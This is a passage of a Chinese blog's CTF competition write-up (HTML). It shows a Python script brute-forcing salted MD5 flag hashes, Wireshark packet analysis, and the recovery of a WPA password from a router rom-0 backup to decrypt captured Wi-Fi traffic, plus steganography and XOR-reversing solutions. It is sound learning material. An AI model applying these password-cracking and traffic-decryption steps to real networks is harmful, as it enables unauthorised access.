class="string">"ad6af4fb623b3c51181a371911667fed.HbQT4dRz"</span>,<span class="string">"c9fa4b0db317d88e2b10060225e92494.ebVnpMzS"</span>,<span class="string">"d0deab17d115bd6fdce8592bb3667643.bL5zwgvX"</span>,<span class="string">"006f0cb3a422716692f143f28eb0d187.NHXg1Fof"</span>,<span class="string">"ddc125de34da1a6ec0cbe401f147bc8f.GDai9Y0n"</span>,<span class="string">"be5052053c5a806e8f56ed64e0d67821.40alyH3w"</span>,<span class="string">"aaf18ac446b8c385c4112c10ae87e7dc.ZJQzuIL0"</span>,<span class="string">"a2db20a4b7386dc2d8c30bf9a05ceef7.QnpOlPWH"</span>,<span class="string">"8a4fbc32a3251bb51072d51969ba5d33.rtcbipeq"</span>,<span class="string">"5e35d2c9675ed811880cea01f268e00f.i1Hbne6h"</span>,<span class="string">"9da23007699e832f4e9344057c5e0bd3.EtbGpMSW"</span>,<span class="string">"f09233683d05171420f963fc92764e84.fxHoinEe"</span>,<span class="string">"4feabf309c5872f3cca7295b3577f2a8.KymkJXqA"</span>,<span class="string">"9b94da2fa9402a3fdb4ff15b9f3ba4d2.G3Tdr1Pg"</span>,<span class="string">"b3cd8d6b53702d733ba515dec1d770c5.Y71LJWZz"</span>,<span class="string">"6a5b3b2526bb7e94209c487585034534.rIwb4oxt"</span>,<span class="string">"e9728ef776144c25ba0155a0faab2526.e1sOXSb8"</span>,<span class="string">"d41a5e7a98e28d76dbd183df7e3bcb49.36bedvia"</span>,<span class="string">"81d5ebfea6aff129cf515d4e0e5f8360.dDG4qTjW"</span>]</span><br><span class="line">n=<span class="number">1000000000</span></span><br><span class="line"><span class="keyword">while</span>(n&lt;<span class="number">10000000000</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">66</span>):</span><br><span class="line">        salt = password[j][<span class="number">33</span>:]</span><br><span class="line">        md5 = password[j][:<span class="number">32</span>]</span><br><span class="line">        mingwen = <span class="string">"&#123;FLAG:"</span>+str(n)+<span class="string">"&#125;"</span>+password[j][<span class="number">33</span>:]</span><br><span class="line">        miwen = hashlib.md5(mingwen.encode(<span class="string">'utf-8'</span>)).hexdigest()</span><br><span class="line">        <span class="keyword">if</span> (miwen == md5) :</span><br><span class="line">            print(mingwen)</span><br><span class="line">            print(password[j])</span><br><span class="line">            n=<span class="number">10000000000</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    print(n)</span><br><span class="line">    n=n+<span class="number">1</span></span><br></pre></td></tr></table></figure>
<p>运行脚本</p>
<p><img src="https://i.loli.net/2018/10/29/5bd68ba4b7012.png" alt=""></p>
<h3 id="网络协议分析"><a href="#网络协议分析" class="headerlink" title="网络协议分析"></a>网络协议分析</h3><h4 id="1-数据包里有甜甜圈哦-（100）"><a href="#1-数据包里有甜甜圈哦-（100）" class="headerlink" title="1.数据包里有甜甜圈哦~（100）"></a>1.数据包里有甜甜圈哦~（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hint:老板给我来982份甜甜圈！</span><br><span class="line">哈？我这里可没有这么多甜甜圈，但我这里有982份的酸奶麦片。</span><br><span class="line">Deal!(成交！)</span><br></pre></td></tr></table></figure>
<p>酸奶麦片！！！(snmp)，直接wireshark过滤器过滤<code>udp contains&quot;flag&quot;</code><img src="https://i.loli.net/2018/10/29/5bd679fbb4ce8.png" alt=""></p>
<p>随便选取一个追踪udp流就可以看到flag。</p>
<p><img src="https://i.loli.net/2018/10/29/5bd67a4e0c44d.png" alt=""></p>
<h4 id="3-我是没有感情的thief（300）"><a href="#3-我是没有感情的thief（300）" class="headerlink" title="3.我是没有感情的thief（300）"></a>3.我是没有感情的thief（300）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">hint:我是Sam，我在船上偷了船长的一封信，但是这封信被加密了，我能力有限无法解密还请各位大佬们帮帮我解密下这封密信，必有重谢！</span><br><span class="line">为了能够更快更有效的解密，我将我知道的信息告诉您们。</span><br><span class="line"></span><br><span class="line">这封密信flag位置为 CTF%xXxxXx% (区分大小写!)</span><br><span class="line">例如 CTF%sdfg7sup1erg6s6NCo8fgh4dg5%，提交内容为sdfg7sup1erg6s6NCo8fgh4dg5</span><br></pre></td></tr></table></figure>
<p>打开数据包，发现大部分都是802.11也就是无线网的数据包，我们过滤http，发现一个get方式请求的rom-0的文件，通过导出http对象分析来提取这个rom-0文件，然后搜索“Decrypt Rom-0”会带你到<a href="http://www.routerpwn.com/" target="_blank" rel="noopener">routerpwn</a> ，在那里你可以上传rom-0文件并解压缩它，因为它是一个Rom-0配置解压缩器（LZS）。</p>
<p>这提供了sp.data内容，其中包含wireshark无线捕获的WPA密码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Rome4040</span><br><span class="line">TP-LINK</span><br><span class="line">public</span><br><span class="line">public</span><br><span class="line">public</span><br><span class="line">public</span><br></pre></td></tr></table></figure>
<p>在编辑 - &gt;首选项 - &gt;协议 - &gt; IEEE 802.11 - &gt;解密密钥 - &gt;新建 - &gt; WPA-PWD中为wireshark提供“Rome4040”并应用它将解密WiFi会话。 </p>
<p><img src="https://i.loli.net/2018/10/29/5bd67c02ade95.png" alt=""></p>
<p>然后再过滤<code>http contains&quot;CTF%&quot;</code></p>
<p><img src="https://i.loli.net/2018/10/29/5bd67e5b79787.png" alt=""></p>
<p>然后追踪一下tcp流得到flag。</p>
<p><img src="https://i.loli.net/2018/10/29/5bd67e94eece9.png" alt=""></p>
<h3 id="杂项"><a href="#杂项" class="headerlink" title="杂项"></a>杂项</h3><h4 id="1-会飞的狗狗（100）"><a href="#1-会飞的狗狗（100）" class="headerlink" title="1.会飞的狗狗（100）"></a>1.会飞的狗狗（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:最近公司截获了一个犯罪份子传播信息的文件，请下载 corgi-can-fly 分析该文件中的内容，flag为英文字符串，包含符号和空格符，提交时请注意。下载地址：http://101.231.137.47:8899/corgi-can-fly.jpg</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2018/10/29/5bd67f9510e0a.jpg" alt=""></p>
<p>直接notepad++打开滑到最后有个base64编码的字符串<img src="https://i.loli.net/2018/10/29/5bd6825a3f8bd.png" alt=""></p>
<p>base64解码后是<code>Did you tried LSB?</code>，所以用StegSolve打开</p>
<p><img src="https://i.loli.net/2018/10/29/5bd68306a2401.png" alt=""></p>
<p>用QR Research扫一下就可以得到flag。</p>
<p><img src="https://i.loli.net/2018/10/29/5bd68342a251a.png" alt=""></p>
<h4 id="2-文件类型分析（100）"><a href="#2-文件类型分析（100）" class="headerlink" title="2.文件类型分析（100）"></a>2.文件类型分析（100）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:请选手下载文件，分析其文件类型。下载地址：http://101.231.137.47:8899/84E726A733B63EBC7ABD3DC5F5967DC8</span><br></pre></td></tr></table></figure>
<p>给了一个压缩包，点开看</p>
<p><img src="https://i.loli.net/2018/10/29/5bd683f560a81.png" alt=""></p>
<p>有一个xml和一个后缀是fdseq的文件，百度一下，说是XPS，试了发现就是flag</p>
<p><img src="https://i.loli.net/2018/10/29/5bd6848e4dc27.png" alt=""></p>
<h4 id="3-真真假假分不清楚（200）"><a href="#3-真真假假分不清楚（200）" class="headerlink" title="3.真真假假分不清楚（200）"></a>3.真真假假分不清楚（200）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:请下载文件hahaha.zip分析获取flag。下载地址：http://101.231.137.47:8899/hahaha.zip</span><br></pre></td></tr></table></figure>
<p>压缩包打开发现要密码，放010editor里发现是伪加密，修改全局标志位将01改成00就可以解压打开获得flag。<img src="https://i.loli.net/2018/10/29/5bd6877077c3a.png" alt=""></p>
<h4 id="4-诱人的音乐（200）"><a href="#4-诱人的音乐（200）" class="headerlink" title="4.诱人的音乐（200）"></a>4.诱人的音乐（200）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hint:玩累啦？那么听点音乐吧！您觉得这份歌单如何呢？</span><br><span class="line">URL:https://music.163.com/#/playlist?id=2473353630&amp;userid=77195412</span><br><span class="line">我觉得下面这首歌比那歌单更有feel!</span><br><span class="line">http://101.231.137.47:8899/PPAP.wav</span><br></pre></td></tr></table></figure>
<p>音频隐写，用audacity打开，发现从9.50左右开始有摩斯电码，将其用二进制写下来为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">01100110=f </span><br><span class="line">01101100=l</span><br><span class="line">01100001=a</span><br><span class="line">01100111=g</span><br><span class="line">01111011=&#123;</span><br><span class="line">01100011=c</span><br><span class="line">01101000=h</span><br><span class="line">00110001=1</span><br><span class="line">01110000=p</span><br><span class="line">01110100=t</span><br><span class="line">01110101=u</span><br><span class="line">01101110=n</span><br><span class="line">01100101=e</span><br><span class="line">01011111=_</span><br><span class="line">00110101=5</span><br><span class="line">00110011=3</span><br><span class="line">01110110=v</span><br><span class="line">01100101=e</span><br><span class="line">01110010=r</span><br><span class="line">01111101=&#125;</span><br></pre></td></tr></table></figure>
<h4 id="5-神秘的文件名（300）"><a href="#5-神秘的文件名（300）" class="headerlink" title="5.神秘的文件名（300）"></a>5.神秘的文件名（300）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hint:小明某天下载了 mobile.tar.gz压缩包，将代码进行修改后发现了神奇的东西请选手分析并获取flag。flag形式为8位小写字母。下载地址：http://101.231.137.47:8899/mobile.tar.gz</span><br></pre></td></tr></table></figure>
<p>解压得到CTF_300放到IDA里找到main函数，f5转伪C代码，然后很明显看到要想得到flag先得通过sub_C14函数判断</p>
<p><img src="https://i.loli.net/2018/10/29/5bd6ab7597000.png" alt=""></p>
<p>而byte_4008首先要通过sub_A30进行异或操作</p>
<p><img src="https://i.loli.net/2018/10/29/5bd6abd71e073.png" alt=""></p>
<p>并且进到sub_C14函数可以看到</p>
<p><img src="https://i.loli.net/2018/10/29/5bd6ac928aba1.png" alt=""></p>
<p>初始值v3等于7，通过判断v2的值来跳转到LABEL_26。</p>
<p><img src="https://i.loli.net/2018/10/29/5bd6acf930c34.png" alt=""></p>
<p>而LABEL_26通过sub_EAC来改变v3的值。所以8次验证正好修改v3的值得到8位的flag。通过思考地推得出v3</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">7   1   3   6   5   9   4   2</span><br></pre></td></tr></table></figure>
<p>再加上输入为0，放脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">a=[<span class="number">105</span>,<span class="number">115</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">103</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">100</span>]</span><br><span class="line">b=[i^<span class="number">1</span> <span class="keyword">for</span> i <span class="keyword">in</span> a]</span><br><span class="line">c=[b[i]^i <span class="keyword">for</span> i <span class="keyword">in</span> range(len(b))]</span><br><span class="line">d=[a[i]^i <span class="keyword">for</span> i <span class="keyword">in</span> range(len(a))]</span><br><span class="line">s1=<span class="string">''</span></span><br><span class="line">s2=<span class="string">''</span></span><br><span class="line">s3=<span class="string">''</span></span><br><span class="line">s4=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(a)):</span><br><span class="line">    s1+=chr(a[i])</span><br><span class="line">    s2+=chr(b[i])</span><br><span class="line">    s3+=chr(c[i])</span><br><span class="line">    s4+=chr(d[i])</span><br><span class="line">print(s1)</span><br><span class="line">print(s2)</span><br><span class="line">print(s3)</span><br><span class="line">print(s4)</span><br></pre></td></tr></table></figure>

    </article>
    <!-- license  -->
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2018/10/16/8086通用指令之通用寄存器/" title= "8086通用指令">
                    <div class="prevTitle">8086通用指令</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:2414617455@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/SuperY4Ng" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                  
                  <img class="profile-qr" src="/assets/wechat.png" />
                </span>
            
        
    
        
            
                <span class="iconfont-archer qq" title=qq>
                  
                  <img class="profile-qr" src="/assets/QQ.png" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="/atom.xml" class="iconfont-archer rss" target="_blank" title=rss></a>
            
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#WEB安全"><span class="toc-number">1.</span> <span class="toc-text">WEB安全</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-web签到题（100）"><span class="toc-number">1.1.</span> <span class="toc-text">1.web签到题（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-输入密码查看flag（100）"><span class="toc-number">1.2.</span> <span class="toc-text">2.输入密码查看flag（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-这真能传马？（100）"><span class="toc-number">1.3.</span> <span class="toc-text">3.这真能传马？（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-这真的能注入？（100）"><span class="toc-number">1.4.</span> <span class="toc-text">4.这真的能注入？（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-怎么拿webshell（200）"><span class="toc-number">1.5.</span> <span class="toc-text">5.怎么拿webshell（200）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-APi（200）"><span class="toc-number">1.6.</span> <span class="toc-text">6.APi（200）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#8-Atom-附加题-100"><span class="toc-number">1.7.</span> <span class="toc-text">8.Atom[附加题] (100)</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#远程漏洞利用"><span class="toc-number">2.</span> <span class="toc-text">远程漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2-远程攻击-2（100）"><span class="toc-number">2.1.</span> <span class="toc-text">2.远程攻击-2（100）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#加密解密"><span class="toc-number">3.</span> <span class="toc-text">加密解密</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-我这密码忘了。。。（100）"><span class="toc-number">3.1.</span> <span class="toc-text">1.我这密码忘了。。。（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-二战时期的密码（100）"><span class="toc-number">3.2.</span> <span class="toc-text">2.二战时期的密码（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-被黑了，求密码（100）"><span class="toc-number">3.3.</span> <span class="toc-text">3.被黑了，求密码（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-出航了-出航了！！（200）"><span class="toc-number">3.4.</span> <span class="toc-text">4.出航了~出航了！！（200）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-IDC密码破解（200）"><span class="toc-number">3.5.</span> <span class="toc-text">5.IDC密码破解（200）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-超级密码（300）"><span class="toc-number">3.6.</span> <span class="toc-text">6.超级密码（300）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#网络协议分析"><span class="toc-number">4.</span> <span class="toc-text">网络协议分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-数据包里有甜甜圈哦-（100）"><span class="toc-number">4.1.</span> <span class="toc-text">1.数据包里有甜甜圈哦~（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-我是没有感情的thief（300）"><span class="toc-number">4.2.</span> <span class="toc-text">3.我是没有感情的thief（300）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#杂项"><span class="toc-number">5.</span> <span class="toc-text">杂项</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-会飞的狗狗（100）"><span class="toc-number">5.1.</span> <span class="toc-text">1.会飞的狗狗（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-文件类型分析（100）"><span class="toc-number">5.2.</span> <span class="toc-text">2.文件类型分析（100）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-真真假假分不清楚（200）"><span class="toc-number">5.3.</span> <span class="toc-text">3.真真假假分不清楚（200）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-诱人的音乐（200）"><span class="toc-number">5.4.</span> <span class="toc-text">4.诱人的音乐（200）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-神秘的文件名（300）"><span class="toc-number">5.5.</span> <span class="toc-text">5.神秘的文件名（300）</span></a></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 9
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/29</span><a class="archive-post-title" href= "/2018/10/29/豌豆杯wp/" >首届豌豆杯WriteUp</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/16</span><a class="archive-post-title" href= "/2018/10/16/8086通用指令之通用寄存器/" >8086通用指令</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/14</span><a class="archive-post-title" href= "/2018/10/14/护网杯WP/" >护网杯WP</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/10</span><a class="archive-post-title" href= "/2018/10/10/流密码/" >流密码</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/08</span><a class="archive-post-title" href= "/2018/10/08/bwapp(1)/" >bwapp(1)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/2018/09/16/渗透测试初步学习之信息收集/" >渗透测试初步学习之信息收集</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/2018/09/16/渗透测试初步学习之漏洞发现/" >渗透测试初步学习之漏洞发现和源码泄露</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/2018/09/16/web开发快速入门(一)/" >WEB开发快速入门（一）</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/2018/09/16/I春秋CTF训练营web题解（一）/" >I春秋CTF训练营web题解（一）</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="二进制"><span class="iconfont-archer">&#xe606;</span>二进制</span>
    
        <span class="sidebar-tag-name" data-tags="CTF"><span class="iconfont-archer">&#xe606;</span>CTF</span>
    
        <span class="sidebar-tag-name" data-tags="WEB"><span class="iconfont-archer">&#xe606;</span>WEB</span>
    
        <span class="sidebar-tag-name" data-tags="渗透测试"><span class="iconfont-archer">&#xe606;</span>渗透测试</span>
    
        <span class="sidebar-tag-name" data-tags="密码学"><span class="iconfont-archer">&#xe606;</span>密码学</span>
    
        <span class="sidebar-tag-name" data-tags="bwapp"><span class="iconfont-archer">&#xe606;</span>bwapp</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="二进制"><span class="iconfont-archer">&#xe60a;</span>二进制</span>
    
        <span class="sidebar-category-name" data-categories="CTF训练"><span class="iconfont-archer">&#xe60a;</span>CTF训练</span>
    
        <span class="sidebar-category-name" data-categories="CTF"><span class="iconfont-archer">&#xe60a;</span>CTF</span>
    
        <span class="sidebar-category-name" data-categories="Web开发"><span class="iconfont-archer">&#xe60a;</span>Web开发</span>
    
        <span class="sidebar-category-name" data-categories="密码学"><span class="iconfont-archer">&#xe60a;</span>密码学</span>
    
        <span class="sidebar-category-name" data-categories="玩转bwapp"><span class="iconfont-archer">&#xe60a;</span>玩转bwapp</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "John Doe"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


